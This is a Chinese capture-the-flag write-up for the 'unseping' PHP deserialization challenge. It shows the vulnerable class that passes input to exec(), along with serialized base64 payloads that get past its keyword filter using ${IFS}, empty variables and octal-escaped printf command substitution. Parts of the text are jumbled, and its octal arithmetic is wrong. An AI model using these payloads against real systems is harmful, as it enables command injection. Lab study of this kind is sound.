攻防世界-unseping
18最佳Writeup由 shuita111 提供WriteUP
收藏
反馈
难度:1
方向:Web
题解数:1
解出人数:255
题目来源: 江苏工匠杯
题目描述:
unseping
题目场景:
100%
倒计时: 3时42分15秒
<?php
highlight_file(__FILE__);
class ease{
private $method;
private $args;
function __construct($method, $args) {
$this->method = $method;
$this->args = $args;
}
function __destruct(){
if (in_array($this->method, array("ping"))) {
call_user_func_array(array($this, $this->method), $this->args);
}
}
function ping($ip){
exec($ip, $result);
var_dump($result);
}
function waf($str){
if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) {
return $str;
} else {
echo "don't hack";
}
}
function __wakeup(){
foreach($this->args as $k => $v) {
$this->args[$k] = $this->waf($v);
}
}
}
$ctf=@$_POST['ctf'];
@unserialize(base64_decode($ctf));
?>
<?php
highlight_file(__FILE__);
class ease{
private $method;
private $args;
function __construct($method, $args) {
$this->method = $method;
$this->args = $args;
}
function __destruct(){
if (in_array($this->method, array("ping"))) {
call_user_func_array(array($this, $this->method), $this->args);
}
}
function ping($ip){
exec($ip, $result);
var_dump($result);
}
function waf($str){
if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) {
return $str;
} else {
echo "don't hack";
}
}
function __wakeup(){
foreach($this->args as $k => $v) {
$this->args[$k] = $this->waf($v);
}
}
}
// $ctf=@$_POST['ctf'];
// @unserialize(base64_decode($ctf));
$obj=new ease("ls","ls //");
$str=serialize($obj);
echo $str,PHP_EOL;
$str=str_replace('O:4','O:+4',$str);
$str=str_replace(':2:',':3:',$str);
echo $str;
echo base64_encode($str);
//--------------------------------
echo "</br>";
//$a=new ease("ping",array('test point'));
$a= new ease("ping",array('pwd'));
$b=serialize($a);
echo $b;
echo base64_encode($b);
?>
$a = new ease("ping",array('l${Z}s'));
$b=serialize($a);
echo $b;
echo base64_encode($b);
?>
//Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czo2OiJsJHtafXMiO319
$a = new ease("ping",array('l${Z}s${IFS}f${Z}lag_1${Z}s_here'));
$b=serialize($a);
echo $b;
echo base64_encode($b);
//Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czozMjoibCR7Wn1zJHtJRlN9ZiR7Wn1sYWdfMSR7Wn1zX2hlcmUiO319
flag_1s_here/flag_831b69012c67b35f.php
访问空白!
貌似是uncode编码$(printf “\154\163”) 但是好像并不是unicode编码
\154\163怎么就能代替ls了!?
印象中“\”开头的是八进制 这会不会是assic码
\154=4+58+18^2=4+40+64=108 对应assic码”l“
\163=3+68+18^2=3+48+64=115 对应assic码”s“
根据这个思路我写了一个c语言的代码
#include <stdio.h>
int main()
{
/* code */
char site[] = "cat flag_1s_here/flag_831b69012c67b35f.php";
for (int i = 0; i < sizeof site / sizeof site[0]; i++) {
printf("\\%o",site[i]);
}
return 0;
}
#/usr/bin/python3
# /* code */
# char site[] = "cat flag_1s_here/flag_831b69012c67b35f.php";
s="cat flag_1s_here/flag_831b69012c67b35f.php"
s1=''
#用于得到字符对应的ASCII码,返回值类型为int型
#01-chr():功能:用于将数 (十进制数、二进制数、八进制数或十六进制数) 转化为其对应的字符。比如:
for i in s:
print(oct(ord(i)))
s1=s1+'\\'+str(oct(ord(i)))[2:]
print(s1)
#运行结果
┌──(kwkl㉿kwkl)-[~/HODL]
└─$ /bin/python3 /home/kwkl/HODL/adworld/web/unseping/c.py
0o143
0o141
0o164
0o40
0o146
0o154
0o141
0o147
0o137
0o61
0o163
0o137
0o150
0o145
0o162
0o145
0o57
0o146
0o154
0o141
0o147
0o137
0o70
0o63
0o61
0o142
0o66
0o71
0o60
0o61
0o62
0o143
0o66
0o67
0o142
0o63
0o65
0o146
0o56
0o160
0o150
0o160
\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160$(printf “\154\163”)
组合一个poc:
$(printf “\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160”)
{Z}s
{Z}lag_1${Z}s_here’));
{Z}s
{Z}lag_1${Z}s_here’));
(printf${IFS}“\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160”)'));
————————————————
<?php
highlight_file(__FILE__);
class ease{
private $method;
private $args;
function __construct($method, $args) {
$this->method = $method;
$this->args = $args;
}
function __destruct(){
if (in_array($this->method, array("ping"))) {
call_user_func_array(array($this, $this->method), $this->args);
}
}
function ping($ip){
exec($ip, $result);
var_dump($result);
}
function waf($str){
if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) {
return $str;
} else {
echo "don't hack";
}
}
function __wakeup(){
foreach($this->args as $k => $v) {
$this->args[$k] = $this->waf($v);
}
}
}
// $ctf=@$_POST['ctf'];
// @unserialize(base64_decode($ctf));
$obj=new ease("ls","ls //");
$str=serialize($obj);
echo $str,PHP_EOL;
$str=str_replace('O:4','O:+4',$str);
$str=str_replace(':2:',':3:',$str);
echo $str;
echo base64_encode($str);
//--------------------------------
echo "</br>";
//$a=new ease("ping",array('test point'));
//$a= new ease("ping",array('pwd'));
//$a = new ease("ping",array('l${Z}s'));
//$a = new ease("ping",array('l${Z}s${IFS}f${Z}lag_1${Z}s_here'));
$a = new ease("ping",array('$(printf${IFS}"\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160")'));
$b=serialize($a);
echo $b;
echo base64_encode($b);
?>Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czozMjoibCR7Wn1zJHtJRlN9ZiR7Wn1sYWdfMSR7Wn1zX2hlcmUiO319
一定要用post方法!
ctf=Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czozMjoibCR7Wn1zJHtJRlN9ZiR7Wn1sYWdfMSR7Wn1zX2hlcmUiO319
Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czoxNjk6IiQocHJpbnRmJHtJRlN9IlwxNDNcMTQxXDE2NFw0MFwxNDZcMTU0XDE0MVwxNDdcMTM3XDYxXDE2M1wxMzdcMTUwXDE0NVwxNjJcMTQ1XDU3XDE0NlwxNTRcMTQxXDE0N1wxMzdcNzBcNjNcNjFcMTQyXDY2XDcxXDYwXDYxXDYyXDE0M1w2Nlw2N1wxNDJcNjNcNjVcMTQ2XDU2XDE2MFwxNTBcMTYwIikiO319
